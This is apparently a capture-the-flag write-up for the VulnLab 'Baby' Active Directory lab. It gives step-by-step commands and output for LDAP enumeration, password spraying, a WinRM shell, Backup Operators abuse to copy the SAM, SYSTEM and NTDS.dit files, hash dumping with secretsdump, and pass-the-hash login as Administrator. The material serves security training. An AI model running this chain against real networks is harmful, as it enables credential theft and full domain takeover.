VulnLab Baby
VulnLab Baby
VulnLab Baby
Baby
Recon
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
└─$ rustscan -a 10.10.70.18 -r 1-65535
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Open ports, closed hearts.
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 10.10.70.18:53
Open 10.10.70.18:88
Open 10.10.70.18:135
Open 10.10.70.18:139
Open 10.10.70.18:389
Open 10.10.70.18:445
Open 10.10.70.18:464
Open 10.10.70.18:593
Open 10.10.70.18:636
Open 10.10.70.18:3389
Open 10.10.70.18:3269
Open 10.10.70.18:3268
Open 10.10.70.18:5357
Open 10.10.70.18:5985
Open 10.10.70.18:9389
Open 10.10.70.18:49667
Open 10.10.70.18:49664
Open 10.10.70.18:49669
Open 10.10.70.18:49675
Open 10.10.70.18:49674
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-10 21:07 +05
Initiating Ping Scan at 21:07
Scanning 10.10.70.18 [4 ports]
Completed Ping Scan at 21:07, 3.05s elapsed (1 total hosts)
Nmap scan report for 10.10.70.18 [host down, received no-response]
Read data files from: /usr/share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.12 seconds
Raw packets sent: 8 (304B) | Rcvd: 0 (0B)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
└─$ nmap -sC -sV -p53,88,135,139,389,445,464,593,636,3268,3269,5357,5985,9389 10.10.70.18
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-10 21:10 +05
Nmap scan report for 10.10.70.18
Host is up (0.091s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-10 16:09:25Z)
135/tcp open tcpwrapped
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open tcpwrapped
445/tcp open tcpwrapped
464/tcp open kpasswd5?
593/tcp open tcpwrapped
636/tcp open tcpwrapped
3268/tcp open tcpwrapped
3269/tcp open tcpwrapped
5357/tcp open tcpwrapped
5985/tcp open tcpwrapped
9389/tcp open tcpwrapped
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-10T16:09:47
|_ start_date: N/A
|_clock-skew: -1m17s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.42 seconds
User
Let’s check ldap anonymous bind
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
└─$ ldapsearch -H ldap://10.10.70.18 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=baby,DC=vl
namingcontexts: CN=Configuration,DC=baby,DC=vl
namingcontexts: CN=Schema,CN=Configuration,DC=baby,DC=vl
namingcontexts: DC=DomainDnsZones,DC=baby,DC=vl
namingcontexts: DC=ForestDnsZones,DC=baby,DC=vl
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
It works, we can try enumerating users. We find Teresa.Bell user with a potential password password in description.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
└─$ ldapsearch -H ldap://10.10.70.18 -x -b "DC=baby,DC=vl"
# extended LDIF
#
# LDAPv3
# base <DC=baby,DC=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# baby.vl
dn: DC=baby,DC=vl
# Administrator, Users, baby.vl
dn: CN=Administrator,CN=Users,DC=baby,DC=vl
<SNIP>
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Teresa Bell
sn: Bell
description: Set initial password to <REDACTED>
givenName: Teresa
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl
instanceType: 4
whenCreated: 20211121151108.0Z
whenChanged: 20211121151437.0Z
displayName: Teresa Bell
uSNCreated: 12889
memberOf: CN=it,CN=Users,DC=baby,DC=vl
<SNIP>
Now we can try spraying password against a list of users, but we need to extract them
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
└─$ ldapsearch -H ldap://10.10.70.18 -x -b "DC=baby,DC=vl" "user" | grep dn
dn: DC=baby,DC=vl
dn: CN=Administrator,CN=Users,DC=baby,DC=vl
dn: CN=Guest,CN=Users,DC=baby,DC=vl
dn: CN=krbtgt,CN=Users,DC=baby,DC=vl
dn: CN=Domain Computers,CN=Users,DC=baby,DC=vl
dn: CN=Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Schema Admins,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
dn: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
dn: CN=Domain Admins,CN=Users,DC=baby,DC=vl
dn: CN=Domain Users,CN=Users,DC=baby,DC=vl
dn: CN=Domain Guests,CN=Users,DC=baby,DC=vl
dn: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
dn: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
dn: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
dn: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Protected Users,CN=Users,DC=baby,DC=vl
dn: CN=Key Admins,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Key Admins,CN=Users,DC=baby,DC=vl
dn: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
dn: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
dn: CN=dev,CN=Users,DC=baby,DC=vl
dn: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
dn: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
dn: CN=Hugh George,OU=dev,DC=baby,DC=vl
dn: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
dn: CN=Ian Walker,OU=dev,DC=baby,DC=vl
dn: CN=it,CN=Users,DC=baby,DC=vl
dn: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
dn: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
dn: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
We find interesting group it, which is a member of Remote Management Users
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# it, Users, baby.vl
dn: CN=it,CN=Users,DC=baby,DC=vl
objectClass: top
objectClass: group
cn: it
member: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
member: CN=Teresa Bell,OU=it,DC=baby,DC=vl
member: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
member: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
member: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
distinguishedName: CN=it,CN=Users,DC=baby,DC=vl
instanceType: 4
whenCreated: 20211121151108.0Z
whenChanged: 20240727221156.0Z
displayName: it
uSNCreated: 12845
memberOf: CN=Remote Management Users,CN=Builtin,DC=baby,DC=vl
uSNChanged: 40986
name: it
objectGUID:: qeenEG1110W2UCafhBWyfA==
objectSid:: AQUAAAAAAAUVAAAAf1veU67Ze+7mkhtWVQQAAA==
sAMAccountName: it
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dSCorePropagationData: 20211121163013.0Z
dSCorePropagationData: 16010101000001.0Z
1
2
3
4
5
└─$ ldapsearch -H ldap://10.10.70.18 -x -b "OU=it,DC=baby,DC=vl" | grep -i samaccountname
sAMAccountName: Connor.Wilkinson
sAMAccountName: Joseph.Hughes
sAMAccountName: Kerry.Wilson
sAMAccountName: Teresa.Bell
Note that caroline.robinson wasn’t in the output, so we had to manually add samaccountname based on username policy. Let’s try spraying password
1
2
3
4
5
6
7
└─$ nxc smb 10.10.70.18 -u users.txt -p '<REDACTED>' --continue-on-success
SMB 10.10.70.18 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.70.18 445 BABYDC [-] baby.vl\Connor.Wilkinson:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.70.18 445 BABYDC [-] baby.vl\Joseph.Hughes:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.70.18 445 BABYDC [-] baby.vl\Kerry.Wilson:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.70.18 445 BABYDC [-] baby.vl\Teresa.Bell:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.70.18 445 BABYDC [-] baby.vl\caroline.robinson:<REDACTED> STATUS_PASSWORD_MUST_CHANGE
Now we have to change the password to be able to use the account. Check this blog
1
2
3
4
5
└─$ smbpasswd -U BABY/caroline.robinson -r 10.10.70.18
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user caroline.robinson
Since caroline.robinson is a member of it which is a member of Remote Management Users, we can try connecting via evil-winrm
1
2
3
4
5
6
7
8
9
10
└─$ evil-winrm -u caroline.robinson -p 'P@ssw0rd!' -i 10.10.70.18
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents>
Root
Let’s enumerate groups. We see Backup Operators
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
*Evil-WinRM* PS C:\> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BABY\it Group S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
The group granted SeBackupPrivilege and SeRestorePrivilege privileges
1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Now let’s download SAM and SYSTEM hives
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
*Evil-WinRM* PS C:\> cd ProgramData
*Evil-WinRM* PS C:\ProgramData> reg save hklm\sam .\sam
The operation completed successfully.
*Evil-WinRM* PS C:\ProgramData> reg save hklm\system .\system
The operation completed successfully.
*Evil-WinRM* PS C:\ProgramData> download sam
Info: Downloading C:\ProgramData\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\ProgramData> download system
Info: Downloading C:\ProgramData\system to system
Info: Download successful!
We also need to download NTDS.dit. First, create txt file with the following content
1
2
3
4
5
6
7
8
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX
Next, upload it to machine and run diskshadow
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
*Evil-WinRM* PS C:\ProgramData> diskshadow /s dump_ntds.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 12/10/2024 5:11:11 PM
-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
Alias cdrive for shadow ID {1e904aa6-b69f-449b-92b2-9981994b672a} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {5301aa8e-c5da-4035-a2b9-5f4211d89c33} set as environment variable.
Querying all shadow copies with the shadow copy set ID {5301aa8e-c5da-4035-a2b9-5f4211d89c33}
* Shadow copy ID = {1e904aa6-b69f-449b-92b2-9981994b672a} %cdrive%
- Shadow copy set: {5301aa8e-c5da-4035-a2b9-5f4211d89c33} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{1b77e212-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 12/10/2024 5:11:26 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent Differential
Number of shadow copies listed: 1
-> expose %cdrive% E:
-> %cdrive% = {1e904aa6-b69f-449b-92b2-9981994b672a}
The shadow copy was successfully exposed as E:\.
-> end backup
->
Then copy NTDS.dit from created shadow volume
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
*Evil-WinRM* PS C:\ProgramData> robocopy /b E:\Windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Tuesday, December 10, 2024 5:12:06 PM
Source : E:\Windows\ntds\
Dest : C:\ProgramData\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 E:\Windows\ntds\
New File 16.0 m ntds.dit
0.0%
<SNIP>
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 16.00 m 16.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
<SNIP>
Download it from machine and run secretsdump
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ secretsdump.py -sam sam -system system -ntds ntds.dit LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
And get last flag
1
2
3
4
5
6
7
8
9
10
11
└─$ evil-winrm -u administrator -H <REDACTED> -i 10.10.70.18
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
https://api.vulnlab.com/api/v1/share?id=3a23bd88-794d-4cf4-8251-1eb3dd84fe4a
This post is licensed under CC BY 4.0 by the author.